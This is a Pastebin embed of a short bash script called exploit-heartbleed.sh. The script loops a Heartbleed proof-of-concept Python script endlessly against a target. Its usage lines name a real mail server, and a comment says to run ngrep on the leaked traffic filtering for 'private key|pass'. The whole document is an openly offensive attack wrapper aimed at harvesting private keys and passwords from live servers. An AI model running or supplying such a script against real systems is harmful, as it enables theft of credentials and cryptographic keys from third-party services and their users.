document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. #! /bin/bash
  2.  
  3. # Usage : ./exploit-heartbleed.sh mail.yahoo.com -p 25 -s smtp
  4. # Usage : ./exploit-heartbleed.sh mail.yahoo.com
  5.  
  6. # On the other terminal, run sudo ./ngrep-heartbleed.sh "private key|pass" 443
  7.  
  8. while [ 1 ]; do python poc-tls-samiux.py $1 $2 $3 $4 $5 $6; done
');